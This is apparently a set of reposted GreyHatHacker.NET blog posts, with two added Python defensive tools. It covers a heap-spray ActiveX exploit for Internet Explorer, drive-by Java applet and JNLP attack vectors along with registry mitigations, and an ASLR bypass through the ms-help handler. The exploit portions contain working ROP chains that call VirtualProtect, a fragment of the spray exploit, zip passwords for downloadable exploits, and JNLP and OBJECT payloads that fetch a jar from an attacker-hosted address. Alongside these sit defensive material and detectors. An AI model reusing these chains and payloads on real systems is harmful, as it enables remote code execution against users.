                                        // PTR DS:[EAX] #PUSH EAX #RETN
    buffer += unescape("%24%62%37%7c")  // 0x7c376224 RETN
    for (i = 0; i < 20; i++)
        buffer += unescape("%43")
    poc.GetHistory(buffer);
    </SCRIPT>

This exploit has been tested and works 100% on Windows XP SP3 IE 6/7/8 and Windows 7 SP1 IE 8/9. I have included the vulnerable library, registry files to remove/add killbits and the exploit in a zip file that can be downloaded from here. The zip file has an md5 hash of d219582269ee0845f8747d0b64910f71 and the password for the zip file is "answerworks" without quotes. If you find when testing the exploit that Windows Calculator fails to load, then check if the msvcr71.dll library is loaded in IE's process space, as I had noticed on one of my test machines that it does not load up.

This heap spraying code should work well for exploiting buffer overflows, but exploiting virtual function calls is something I'll need to look into and is on my to-learn list. On Windows 7 the only real dependency lies in having Java 6 installed, as the library msvcr71.dll which comes with Java 6 is not ASLRed nor gets rebased. If Java 7 is installed then another rop chain would need to be used as Java 7 libraries are all ASLRed. Windows XP is not subject to ASLR so another rop chain could be used if Java 6 is not installed.
References:

Security Advisory SA26566 - Vantage Linguistics AnswerWorks 4 API ActiveX Control Buffer Overflow - Secunia
Security Vulnerability Patch for iSEEK AnswerWorks Desktop Help Search
Microsoft Security Bulletin MS07-069 - Critical: Cumulative Security Update for Internet Explorer (942615)
https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/

Source: Heap spraying in Internet Explorer with rop nops | GreyHatHacker.NET
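As an added example (not code from the original post), here is a Python heuristic from the detection side that flags the spray idioms the post walks through: %u-escaped unescape() strings, the string-doubling loop, a large hex chunk size, the identity substring copy that forces a fresh allocation, and a big array-fill loop. The two HTML pages it scans are constructed for illustration; any single idiom is common in benign scripts, so only several together count.

```python
import re
from typing import Dict

# Each pattern targets one idiom from the spray code discussed in the post.
# unescape("%u....%u....") strings
_UNICODE_ESCAPE = re.compile(r'unescape\(\s*["\'](?:%u[0-9a-fA-F]{4})+["\']')
# while (x.length < n) x += x;  -- exponential growth of the sled
_DOUBLING_LOOP = re.compile(
    r'while\s*\(\s*(\w+)\.length\s*<\s*\w+\s*\)\s*\{?\s*\1\s*\+=\s*\1\b')
# x.substring(0, x.length) -- a no-op copy whose only purpose is a new heap block
_IDENTITY_SUBSTRING = re.compile(r'(\w+)\.substring\(\s*0\s*,\s*\1\.length\s*\)')
# hex literals of 5+ digits, e.g. a 0x40000 chunk size
_BIG_HEX = re.compile(r'0x([0-9a-fA-F]{5,8})\b')
# for (i = 0; i < N; ...) { ... arr[i] = ...   with a literal bound N
_FILL_LOOP = re.compile(
    r'for\s*\(\s*(?:var\s+)?(\w+)\s*=\s*0\s*;\s*\1\s*<\s*(\d+)\s*;[^)]*\)'
    r'\s*\{?[^}]*?\w+\[\s*\1\s*\]\s*=')
_SCRIPT_BODY = re.compile(r'<script\b[^>]*>(.*?)</script>', re.I | re.S)


def script_text(html: str) -> str:
    """Concatenate the bodies of all <script> elements in a page."""
    return "\n".join(_SCRIPT_BODY.findall(html))


def heap_spray_indicators(js: str) -> Dict[str, int]:
    """Count occurrences of each spray idiom in a script body."""
    return {
        "unicode_escape_strings": len(_UNICODE_ESCAPE.findall(js)),
        "string_doubling_loop": len(_DOUBLING_LOOP.findall(js)),
        "identity_substring_copy": len(_IDENTITY_SUBSTRING.findall(js)),
        "large_hex_size": sum(1 for m in _BIG_HEX.finditer(js)
                              if int(m.group(1), 16) >= 0x10000),
        "large_array_fill_loop": sum(1 for m in _FILL_LOOP.finditer(js)
                                     if int(m.group(2)) >= 256),
    }


def spray_score(js: str) -> int:
    """Number of distinct idiom families present (0..5)."""
    return sum(1 for count in heap_spray_indicators(js).values() if count > 0)


def is_probable_heap_spray(html: str, threshold: int = 3) -> bool:
    """Flag a page when at least `threshold` idiom families co-occur in its scripts."""
    return spray_score(script_text(html)) >= threshold


# Constructed samples (not from the original post): a benign page and a spray-shaped one.
BENIGN_PAGE = """<html><script>
var items = document.getElementsByTagName('li');
for (var i = 0; i < items.length; i++) { items[i].className = 'x'; }
</script></html>"""

SPRAY_PAGE = """<html><script language="JavaScript">
var block = unescape("%u4141%u4141");
var chunk_size = 0x40000, headersize = 0x24;
var nopsled = unescape("%u4141%u4141");
var nopsled_len = chunk_size - (headersize + block.length);
while (nopsled.length < nopsled_len) nopsled += nopsled;
nopsled = nopsled.substring(0, nopsled_len);
var heap_chunks = new Array();
for (i = 0; i < 1000; i++) {
    codewithnum = i + nopsled + block;
    heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
}
</script></html>"""

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("spray-shaped", SPRAY_PAGE)):
        print(name, heap_spray_indicators(script_text(page)),
              "-> flagged" if is_probable_heap_spray(page) else "-> clean")
```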
-
Exploiting and mitigating Java exploits in Internet Explorer

This year we've seen a number of 0 day Java exploits surfacing and various mitigating steps mentioned on various sites that could be taken to prevent us from being compromised. A lot of these mitigating steps vary from each other, so when it comes to mitigating Java in Internet Explorer it adds doubt as to which are the best mitigation steps to follow. Uninstalling Java would obviously solve the problem but that is not really an option in organisations dependent on Java. This post describes the mitigating steps available, the tests carried out and how to bypass certain mitigations. The tests have been carried out on a fully patched Windows 7 Enterprise 32bit virtual machine with Internet Explorer 8 and a vulnerable version of Java.

Prevent loading of applet in IE's "Internet Zone"

This setting disables the loading of Java applets from the Internet zone. There are different keys representing different security zones [3] and the Internet zone has a value of 3.

    ; First set the URLAction to control APPLET behavior
    ; Zone 3 is the Internet zone
    ; 1C00 is the Java invocation policy
    ; "1C00"=dword:00000000 <-- disable loading of Java applet
    ; "1C00"=dword:00010000 <-- enable loading of Java applet
    ;
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
    "1C00"=dword:00000000

The HKEY_CURRENT_USER (HKCU) entry takes priority. So if disabled in HKEY_LOCAL_MACHINE (HKLM) but enabled in HKCU then you will still be exploited, so it is best just to apply the change in HKCU. Any external site attempting to use an applet tag will now not load the applet and a notification bar will be displayed. This mitigation would only protect from the applet tag examples below. With other techniques this mitigation is ineffective.
    <APPLET archive="calc.jar" code="Exploit.class" width="1" height="1"></APPLET>
    <APPLET code="Exploit.class" width="1" height="1"></APPLET>

Prevent loading of applet in all IE zones

This setting stops the loading of Java in all IE browser zones. This might be a problem internally in organisations which depend on the applet tag.

    ; "UseJava2IExplorer"=dword:00000000 <-- disable loading of Java applet
    ; "UseJava2IExplorer"=dword:00000001 <-- enable loading of Java applet
    ;
    [HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Plug-in\10.7.2]
    "UseJava2IExplorer"=dword:00000000

An issue with this mitigation is that each time Java is installed the mitigation gets reset to its default value, as a new Java version registry key is added.

    10.4.0 – Java 7 update 4
    10.6.2 – Java 7 update 6
    10.7.2 – Java 7 update 7
    10.9.2 – Java 7 update 9

Once the mitigation has been made a popup would be seen the first time. If the check box "Do not show this message again" is ticked, it writes to the registry entry below.

    [HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Declined Install On Demand IEv5]
    "{08B0e5c0-4FCB-11CF-AAA5-00401C608501}"=""

This mitigation only stops exploits using the applet tag, cannot be managed by Internet Explorer zones, and any new Java update means you'll need to update the registry again.

Invoking Java classids via OBJECT tag

Internet Explorer can use the classid attribute of the OBJECT tag to load Java. Hundreds of Java classids get registered when Java is installed. One classid is particularly dangerous as it works transparently from the Internet zone without any notification bars or alerts, and has been used in actual exploits. The reason is that this classid gets added to the preapproved list.

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{8AD9C840-044E-11D1-B3E9-00805F499D93}

This classid calls the latest version of Java Plug-in installed on the machine.
What's interesting is that this classid is already added in the Windows 7 preapproved registry key without Java even being installed. To mitigate, this classid needs to be killbitted:

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{8AD9C840-044E-11D1-B3E9-00805F499D93}]
    "Compatibility Flags"=dword:00000400

To exploit, it can be called like this:

    <OBJECT classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="1" height="1">
    <PARAM name="code" value="Exploit.class">
    </OBJECT>

Another way to mitigate this classid is to disable the Java Plugin's ActiveX control through IE's "Manage Add-ons". Once disabled it writes to the registry below and the settings are retained even after a Java update, though I prefer the killbit option.

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{8AD9C840-044E-11D1-B3E9-00805F499D93}]
    "Flags"=dword:00000001
    "Version"="*"

The hundreds of other classids are mainly for backwards compatibility. So if an older specific version of Java is installed, those can be called using a specific classid; in the example below it's calling Java 7 update 7.

    <OBJECT classid="clsid:CAFEEFAC-0017-0000-0007-ABCDEFFEDCBA" width="1" height="1">
    <PARAM name="code" value="Exploit.class">
    </OBJECT>

Or to invoke the latest Java 7 version installed:

    <OBJECT classid="clsid:CAFEEFAC-0017-0000-FFFF-ABCDEFFEDCBA" width="1" height="1">
    <PARAM name="code" value="Exploit.class">
    </OBJECT>

The way the classid versions are worked out is that in, say, CAFEEFAC-xxxx-yyyy-zzzz-ABCDEFFEDCBA, "xxxx", "yyyy", and "zzzz" are four-digit numbers identifying the specific version of Java Plug-in to be used. In references [1][2] only the handful of classids listed below are given, but actually when Java gets installed it installs hundreds of classids. Click here to see all the CAFEEFAC- classids registered on a Java 7 update 4 installation.
In these references just killbitting these classids does not make sense, as invoking any other classid will give the same two prompts as these ones (screenshots given further down in the Java Web Start ActiveX control section). So if you are thinking of killbitting these classids then follow CERT's recommendation [4], as it kills all classids up to a certain version. A Java update will register newer classids each time, so if killbitting these is an option you prefer then you'll need to keep up to date. These classids are the only ones mentioned for Java version 7 up to update 6.

    CAFEEFAC-0017-0000-FFFF-ABCDEFFEDCBA
    CAFEEFAC-0017-0001-FFFF-ABCDEFFEDCBA
    CAFEEFAC-0017-0002-FFFF-ABCDEFFEDCBA
    CAFEEFAC-0017-0003-FFFF-ABCDEFFEDCBA
    CAFEEFAC-0017-0004-FFFF-ABCDEFFEDCBA
    CAFEEFAC-0017-0005-FFFF-ABCDEFFEDCBA
    CAFEEFAC-0017-0006-FFFF-ABCDEFFEDCBA
    CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA

So CAFEEFAC-0017-0006-FFFF-ABCDEFFEDCBA might have been killbitted, but if you know the Java version you are attacking you could use:

    CAFEEFAC-0017-0000-0006-ABCDEFFEDCBA
    CAFEEFAC-0017-0000-0006-ABCDEFFEDCBB
    CAFEEFAC-0017-0000-0006-ABCDEFFEDCBC

Another registered classid invokes an old version of Java, and to exploit using this classid you'll have to deal with a third warning window prompt, and this would come up every time. To exploit:

    <HTML>
    <OBJECT CLASSID="clsid:E19F9331-3110-11D4-991C-005004D3B3DB" width="1" height="1">
    <PARAM name="code" value="Exploit.class">
    </OBJECT>
    </HTML>

And to mitigate, killbit the control:

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{E19F9331-3110-11D4-991C-005004D3B3DB}]
    "Compatibility Flags"=dword:00000400

Loading Java via the EMBED tag

Java can also be exploited in Internet Explorer using the EMBED tag. Here the applet mitigations are ineffective, but killbitting/disabling the ActiveX control 8AD9C840-044E-11D1-B3E9-00805F499D93 as mentioned in the previous section mitigates it.
To exploit:

    <HTML>
    <EMBED code="Exploit.class" type="application/x-java-applet" width="1" height="1"></EMBED>
    </HTML>

Here the mimetype "application/x-java-applet" points back to classid 8AD9C840-044E-11D1-B3E9-00805F499D93.

Prevent automatically opening JNLP files via APPLET

Java Network Launch Protocol (JNLP) could also be used for launching applets directly from JNLP files. To launch an applet from a JNLP file the "jnlp_href" parameter would need to be used in the applet tag. This could be used in a transparent drive-by attack too.

    <HTML>
    <APPLET><param name="jnlp_href" value="mycalc.jnlp"></APPLET>
    </HTML>

The jnlp file doesn't need to contain the full url path.

    <?xml version="1.0" encoding="UTF-8"?>
    <jnlp href="mycalc.jnlp">
      <information>
        <title>Calculator</title>
        <vendor>POC</vendor>
      </information>
      <resources>
        <j2se version="1.7+" />
        <jar href="calc.jar" main="true" />
      </resources>
      <applet-desc name="Calculator" main-class="Exploit" width="1" height="1">
      </applet-desc>
    </jnlp>

When calling the jnlp file via the html file, the jnlp file can have any extension, so say in the above code mycalc.jnlp could be called mycalc.txt. Since this uses the applet tag, the above mitigation on the applet would mitigate this threat.

Double-clicking on a JNLP file

Even with all the browser mitigations in place, it doesn't stop an attacker emailing a jnlp file to the victim. Just double-clicking the attachment would compromise the machine.

    <?xml version="1.0" encoding="UTF-8"?>
    <jnlp href="mycalc.jnlp">
      <information>
        <title>Calculator</title>
        <vendor>POC</vendor>
      </information>
      <resources>
        <j2se version="1.7+" />
        <jar href="http://192.168.1.3/calc.jar" main="true"/>
      </resources>
      <applet-desc name="Calculator" main-class="Exploit" width="1" height="1">
      </applet-desc>
    </jnlp>

One way to mitigate is to change the file association and/or block jnlp file attachments on your mail relays.
    HKLM\SOFTWARE\Classes\JNLPFile\Shell\Open\Command\: "C:\Program Files\Java\jre7\bin\javaws.exe" "%1"

Prevent automatically opening JNLP files via mimetype association

Java Web Start can be used to open a JNLP file. By default JNLP files open without any interaction from the user. For this to be exploited the web server would have to be configured with the .jnlp file extension mapped to the mimetype "application/x-java-jnlp-file". Then simply visiting a link, say http://192.168.1.3/mycalc.jnlp, would compromise your box.

    <?xml version="1.0" encoding="utf-8"?>
    <jnlp href="mycalc.jnlp" codebase="http://192.168.1.3/">
      <information>
        <title>Calculator</title>
        <vendor>POC</vendor>
      </information>
      <resources>
        <j2se version="1.7+"/>
        <jar href="calc.jar" main="true"/>
      </resources>
      <applet-desc name="Calculator" main-class="Exploit" width="1" height="1">
      </applet-desc>
    </jnlp>

Signing your own app and using the jnlp code below could also be used, but user interaction is required and you don't need a vulnerability for this one.

    <?xml version="1.0" encoding="utf-8"?>
    <jnlp href="mycalc.jnlp" codebase="http://192.168.1.3/">
      <information>
        <title>Calculator</title>
        <vendor>POC</vendor>
      </information>
      <security>
        <all-permissions/>
      </security>
      <resources>
        <jar href="mycalc_signed.jar" main="true"/>
      </resources>
      <application-desc name="Calculator" main-class="mycalc" width="1" height="1">
      </application-desc>
    </jnlp>

To mitigate we can change the default setting of EditFlags to all zeros, which will then prompt the user.

    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JNLPFile]
    "EditFlags"=dword:00000000

In the CERT advisory EditFlags is a binary value, but a dword value can also be used.

Prevent automatically opening JNLP files via ActiveX Control

The Java Web Start ActiveX control can also be used to run a JNLP file, but user interaction is required.
To exploit:

    <HTML>
    <OBJECT CLASSID="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" width="1" height="1">
    <PARAM name="app" value="http://192.168.1.3/mycalc.jnlp">
    </OBJECT>
    </HTML>

and the JNLP file is:

    <?xml version="1.0" encoding="UTF-8"?>
    <jnlp href="mycalc.jnlp">
      <information>
        <title>Calculator</title>
        <vendor>POC</vendor>
      </information>
      <resources>
        <j2se version="1.7+" />
        <jar href="calc.jar" main="true" />
      </resources>
      <applet-desc name="Calculator" main-class="Exploit" width="1" height="1">
      </applet-desc>
    </jnlp>

To mitigate, killbit this classid:

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{5852F5ED-8BF4-11D4-A245-0080C6F74284}]
    "Compatibility Flags"=dword:00000400

Java Deployment Toolkit ActiveX Controls

The Java Deployment Toolkit classid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA was exploited in 2010 (CVE-2010-1423). On a fully patched Windows 7 machine this has already been killbitted without Java even being installed, and points to an alternate classid CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA. This classid has been killbitted in CERT's mitigation so it's recommended to keep this one killbitted too.

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}]
    "Compatibility Flags"=dword:00000400

Preventing compromise

So what it comes down to is that just these few changes on your system prevent it from being compromised automatically by a drive-by attack.
    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JNLPFile]
    "EditFlags"=dword:00000000

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
    "1C00"=dword:00000000

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{8AD9C840-044E-11D1-B3E9-00805F499D93}]
    "Compatibility Flags"=dword:00000400

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}]
    "Compatibility Flags"=dword:00000400

Renaming the "jp2iexp.dll" file would also temporarily mitigate the APPLET and OBJECT tag attack vectors but not the others mentioned. A Java update installation would drop the file back though, so bear that in mind.

Other classids that would need some interaction are also best killbitted:

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{5852F5ED-8BF4-11D4-A245-0080C6F74284}]
    "Compatibility Flags"=dword:00000400

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{E19F9331-3110-11D4-991C-005004D3B3DB}]
    "Compatibility Flags"=dword:00000400

Using the latest classids for the Java version would require the user to acknowledge two warnings, but once accepted thereafter no warning would be given, so killbitting the CAFEEFAC- classids might be worth thinking about in your managed environment. Finally, JNLP files could be sent via email, so you might want to take a proactive step in blocking jnlp file attachments on your mail relays.

Latest Java release

Following the release of Java 7 update 10 last week I thought I'd do a quick check on its new security features. There is now an updated security tab giving the user more control over what to do. Changing the security levels makes changes to the file deployment.properties in the location C:\Users\user1\AppData\LocalLow\Sun\Java\Deployment. By default it's set to medium, but if changed to low the entry deployment.security.level=LOW is added to the file.
Since this is in a low integrity folder, this could be changed to the LOW setting by a low privileged user.

    #deployment.properties
    #Wed Dec 19 17:48:16 GMT 2012
    deployment.modified.timestamp=1355939296772
    deployment.version=7.0
    deployment.security.level=LOW
    deployment.webjava.enabled=false

    #Java Deployment jre's
    #Wed Dec 19 17:48:16 GMT 2012
    deployment.javaws.jre.0.registered=true
    deployment.javaws.jre.0.platform=1.7
    deployment.javaws.jre.0.osname=Windows
    deployment.javaws.jre.0.path=C\:\\Program Files\\Java\\jre7\\bin\\javaw.exe
    deployment.javaws.jre.0.product=1.7.0_10
    deployment.javaws.jre.0.osarch=x86
    deployment.javaws.jre.0.location=http\://java.sun.com/products/autodl/j2se
    deployment.javaws.jre.0.enabled=true
    deployment.javaws.jre.0.args=

Un-checking "Enable Java content in the browser" is quite a drastic step as it deletes all classids, mimetypes, the jnlp file association, etc. The command that gets run when un-checking and applying is:

    "C:\PROGRA~1\Java\jre7\bin\ssvagent.exe" -disablewebjava

This feature would most definitely protect from browser based attacks but would also most likely break all your internal apps, so it is not something to implement without thorough testing in an enterprise environment. For home users it gives the flexibility to enable and disable when needed, say if you want to do a vulnerability scan which uses Java.

Conclusion

This research has shown that if you don't need Java it's best to just uninstall it. If there is a requirement then upgrade to Java 7u10 and uncheck the Java content in the browser setting. Finally, follow only CERT's advisory [4] or at the very least make the few mitigating changes mentioned in the "Preventing compromise" section, regardless of whether you have "Java Content in the browser" enabled or disabled.
References:

[1] How to disable Java – Internet Explorer | Naked Security
[2] How to disable the Java web plug-in in Internet Explorer
[3] Internet Explorer security zones registry entries for advanced users
[4] US-CERT Vulnerability Note VU#636312 - Oracle Java JRE 1.7 Expression.execute() and SunToolkit.getField() fail to restrict access to privileged code
[5] How to Unplug Java from the Browser — Krebs on Security
[6] Controlling Java in Internet Explorer - IEInternals - Site Home - MSDN Blogs
[7] Using APPLET, OBJECT and EMBED Tags
[9] Java[tm] Web Start Developer's Guide
[10] JNLP File Syntax
[11] JNLP Support in the Next Generation Java™ Plug-In Technology (introduced in Java SE 6 update 10)
[12] Setting the Security Level of the Java Client

Source: Exploiting and mitigating Java exploits in Internet Explorer | GreyHatHacker.NET
-
Bypassing Microsoft Windows ASLR with a little help by MS-Help

Exploiting vulnerabilities on Windows 7 is not as easy as it used to be on Windows XP. Writing an exploit to bypass ASLR and DEP on Windows 7 was still relatively easy if Java 6 was installed, as it got shipped with the non-ASLR msvcr71.dll library. Now that Java 7 has been out for a while, hopefully everyone should be using this version, as msvcr71.dll does not exist with Java 7. With this in mind, creating a reliable ROP chain is going to be difficult again, as finding some information leak is, my guess, not going to be straightforward, not to mention the time it would take to create our ROP chain if a leak even exists. So I set myself the task to see if I could create a reliable static ROP chain on a fully patched Windows 7 machine with and without Microsoft Office.

Windows 7 only

After carrying out a default installation of Windows 7 SP1 (Enterprise) and getting it all up-to-date with patches, I carried out a scan of all non-ASLR DLLs on the system and was amazed to find nearly 600 non-ASLR DLLs. Ok, a lot were duplicates, so removing these from my list I ended up with around 200 unique DLLs to play with. One way I thought I could possibly load the library in Internet Explorer is by calling a classid object tag, so after searching for the clsid string in the DLLs one library stood out: "VsaVb7rt.dll".

    Filename - VsaVb7rt.dll
    Path - C:\Windows\Microsoft.NET\Framework\v2.0.50727\
    MD5 hash - 22f450c23d8abdfa6bed991ad1c34b1c
    Size - 1,340,752 bytes
    Signed - 29th September 2010 08:46:12

After obtaining the classid guid using the tool Bintext I loaded it up in the browser:

    <HTML>
    <OBJECT classid='clsid:A138CF39-2CAE-42c2-ADB3-022658D79F2F'></OBJECT>
    </HTML>

The issue with loading libraries via guids is that user interaction is first required before exploiting, so in the real world this would not be a viable option unless you're testing your own exploits from a specific address.
Once the security warning is accepted it writes to the registry entry below.

Windows 7 with MSOffice 2007/2010

With Windows 7 being a failure I turned my attention to Office 2007, as most users running Windows 7 should be running Office 2010 or at the very least running Office 2007. After a default installation of "Microsoft Office 2007 Plus", getting it fully up-to-date and carrying out another scan, a number of additional non-ASLR DLLs were found that could be loaded via their own guids as above, but again pretty useless with the prompts given. After browsing/grepping the strings in the libraries I found one library that could be loaded in Internet Explorer without any interaction, that library being "hxds.dll". This library can be loaded using its protocol handler by location.href = 'ms-help:'

    <SCRIPT language="JavaScript">
    location.href = 'ms-help:'
    </SCRIPT>

This library does not get rebased either, so it is perfect for our ROP chain. Carrying out the same routine with "Microsoft Office 2010 Plus" I found the same library "hxds.dll" that we can use, but our ROP chain would be different as the file has been updated.
Details of the library on Office 2007:

    Filename - hxds.dll
    Path - C:\Program Files\Common Files\microsoft shared\Help\
    MD5 hash - 9e7370cc3d6a43942433f85d0e2bbdd8
    Size - 873,216 bytes
    Signed - 19th August 2006 11:52:41

Details of the library on Office 2010:

    Filename - hxds.dll
    Path - C:\Program Files\Common Files\microsoft shared\Help\
    MD5 hash - 23fdb0c309e188a5e3c767f8fc557d83
    Size - 877,368 bytes
    Signed - 23rd May 2009 12:24:33

Here is the ROP chain generated by Mona.py on Office 2007:

    0x51be25dc, # POP EDI # RETN [hxds.dll]
    0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
    0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
    0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
    0x51bf1761, # POP EBP # RETN [hxds.dll]
    0x51c4b2df, # & call esp [hxds.dll]
    0x51bf2e19, # POP EBX # RETN [hxds.dll]
    0x00000201, # 0x00000201-> ebx
    0x51bfa969, # POP EDX # RETN [hxds.dll]
    0x00000040, # 0x00000040-> edx
    0x51c385a2, # POP ECX # RETN [hxds.dll]
    0x51c5b991, # &Writable location [hxds.dll]
    0x51bf7b52, # POP EDI # RETN [hxds.dll]
    0x51c3f011, # RETN (ROP NOP) [hxds.dll]
    0x51c433d7, # POP EAX # RETN [hxds.dll]
    0x90909090, # nop
    0x51c0a4ec, # PUSHAD # RETN [hxds.dll]

and the ROP chain on Office 2010:

    0x51bf34b4, # POP ESI # RETN [hxds.dll]
    0x51bd10b8, # ptr to &VirtualProtect() [IAT hxds.dll]
    0x51bd2d97, # MOV EAX,DWORD PTR DS:[ESI] # RETN [hxds.dll]
    0x51bdcba0, # XCHG EAX,ESI # RETN 00 [hxds.dll]
    0x51c379e2, # POP EBP # RETN [hxds.dll]
    0x51c59683, # & call esp [hxds.dll]
    0x51be198c, # POP EBX # RETN [hxds.dll]
    0x00000201, # 0x00000201-> ebx
    0x51c35ac3, # POP EDX # RETN [hxds.dll]
    0x00000040, # 0x00000040-> edx
    0x51becf3e, # POP ECX # RETN [hxds.dll]
    0x51c5d150, # &Writable location [hxds.dll]
    0x51bef563, # POP EDI # RETN [hxds.dll]
    0x51c07402, # RETN (ROP NOP) [hxds.dll]
    0x51c56fbd, # POP EAX # RETN [hxds.dll]
    0x90909090, # nop
    0x51c3604e, # PUSHAD # RETN [hxds.dll]

In order for our exploit to be successful, I've seen it's best to call the protocol handler after the heap spray and before triggering the vulnerability. Finally, here is an exploit (password "answerworks", md5 hash 5bc94894890298710f30d91d6104e568) based on my last post where I have just changed the ROP chain from using msvcr71.dll to using hxds.dll.

For now I see two options to mitigate this. One is to disable the protocol handler, which can be done easily by changing the name or value in the registry or deleting it completely. The downside is that I don't know how it would impact applications using this handler.

    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ms-help]
    @="Help HxProtocol"
    "CLSID"="{314111c7-a502-11d2-bbca-00c04f8ec294}"

The second option would be to get Microsoft EMET installed if you haven't already done so and make sure "MandatoryASLR" is enabled for the iexplore.exe process. I can't emphasize enough how vital it is to have this tool installed, so please do not delay and get it deployed ASAP.

Source: Bypassing Microsoft Windows ASLR with a little help by MS-Help | GreyHatHacker.NET
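As an added example (not the posts' own code), a Python audit of the registry mitigations from the "Preventing compromise" section of the Java post above together with the ms-help protocol handler from this post: it reports which killbits, the Zone 3 applet policy and the JNLPFile EditFlags are not set, and whether the ms-help handler that loads hxds.dll is still registered. Reading the live registry needs Windows (winreg); the HARDENED and UNHARDENED snapshots are constructed so the logic also runs elsewhere, and the key paths are those given in the posts (tested there on 32-bit Windows 7).

```python
import sys
from typing import Dict, List, Tuple, Union

RegValue = Union[int, str]
RegPath = Tuple[str, str, str]           # (hive, subkey, value name)
Snapshot = Dict[RegPath, RegValue]       # a missing entry means the value does not exist

KILLBIT_BASE = r"Software\Microsoft\Internet Explorer\ActiveX Compatibility"
ZONE3 = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"
KILLBIT = 0x400                          # the "Compatibility Flags" bit set in the post

# Each check: registry path, comparison ("eq" exact value, "bit" bit must be set),
# required value, and the attack path from the Java post that it closes.
CHECKS = [
    (("HKLM", r"SOFTWARE\Classes\JNLPFile", "EditFlags"), "eq", 0,
     "JNLP files prompt instead of opening automatically"),
    (("HKCU", ZONE3, "1C00"), "eq", 0,
     "APPLET tag disabled in the Internet zone (HKCU takes priority over HKLM)"),
    (("HKLM", KILLBIT_BASE + r"\{8AD9C840-044E-11D1-B3E9-00805F499D93}",
      "Compatibility Flags"), "bit", KILLBIT,
     "pre-approved Java Plug-in classid (OBJECT/EMBED) killbitted"),
    (("HKLM", KILLBIT_BASE + r"\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}",
      "Compatibility Flags"), "bit", KILLBIT,
     "Java Deployment Toolkit classid killbitted"),
    (("HKLM", KILLBIT_BASE + r"\{5852F5ED-8BF4-11D4-A245-0080C6F74284}",
      "Compatibility Flags"), "bit", KILLBIT,
     "Java Web Start ActiveX control killbitted"),
    (("HKLM", KILLBIT_BASE + r"\{E19F9331-3110-11D4-991C-005004D3B3DB}",
      "Compatibility Flags"), "bit", KILLBIT,
     "legacy Java Plug-in classid killbitted"),
]
# The handler this post uses to load hxds.dll without a prompt.
MSHELP_HANDLER: RegPath = ("HKLM", r"SOFTWARE\Classes\PROTOCOLS\Handler\ms-help", "CLSID")


def check_passes(snapshot: Snapshot, path: RegPath, mode: str, required: int) -> bool:
    value = snapshot.get(path)
    if not isinstance(value, int):
        return False                     # absent or not a DWORD: mitigation not applied
    return value == required if mode == "eq" else (value & required) == required


def missing_mitigations(snapshot: Snapshot) -> List[str]:
    """Descriptions of the mitigations from the post that the snapshot does not satisfy."""
    return [desc for path, mode, req, desc in CHECKS
            if not check_passes(snapshot, path, mode, req)]


def mshelp_handler_present(snapshot: Snapshot) -> bool:
    """True while the ms-help: handler is registered, i.e. hxds.dll is still loadable."""
    return MSHELP_HANDLER in snapshot


def read_registry_snapshot() -> Snapshot:
    """Read the audited values from the live registry; Windows only (uses winreg)."""
    import winreg
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    snapshot: Snapshot = {}
    for hive, subkey, name in [c[0] for c in CHECKS] + [MSHELP_HANDLER]:
        try:
            with winreg.OpenKey(hives[hive], subkey) as key:
                snapshot[(hive, subkey, name)] = winreg.QueryValueEx(key, name)[0]
        except OSError:
            pass                         # key or value does not exist
    return snapshot


def report(snapshot: Snapshot) -> str:
    lines = ["MISSING: " + d for d in missing_mitigations(snapshot)] or [
        "all registry mitigations from the post are applied"]
    lines.append("ms-help: handler " + (
        "PRESENT (rename/remove to block hxds.dll loading)"
        if mshelp_handler_present(snapshot) else "absent"))
    return "\n".join(lines)


# Constructed snapshots for running off-Windows; not taken from a real machine.
HARDENED: Snapshot = {path: req for path, _, req, _ in CHECKS}
UNHARDENED: Snapshot = {
    ("HKCU", ZONE3, "1C00"): 0x10000,    # the "enable applet" value quoted in the post
    MSHELP_HANDLER: "{314111c7-a502-11d2-bbca-00c04f8ec294}",
}

if __name__ == "__main__":
    print(report(read_registry_snapshot() if sys.platform == "win32" else UNHARDENED))
```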
-
It's Tinkode, in case you didn't catch on.
-
Pff, I wanted to do something like this too. But it looks very good.
-
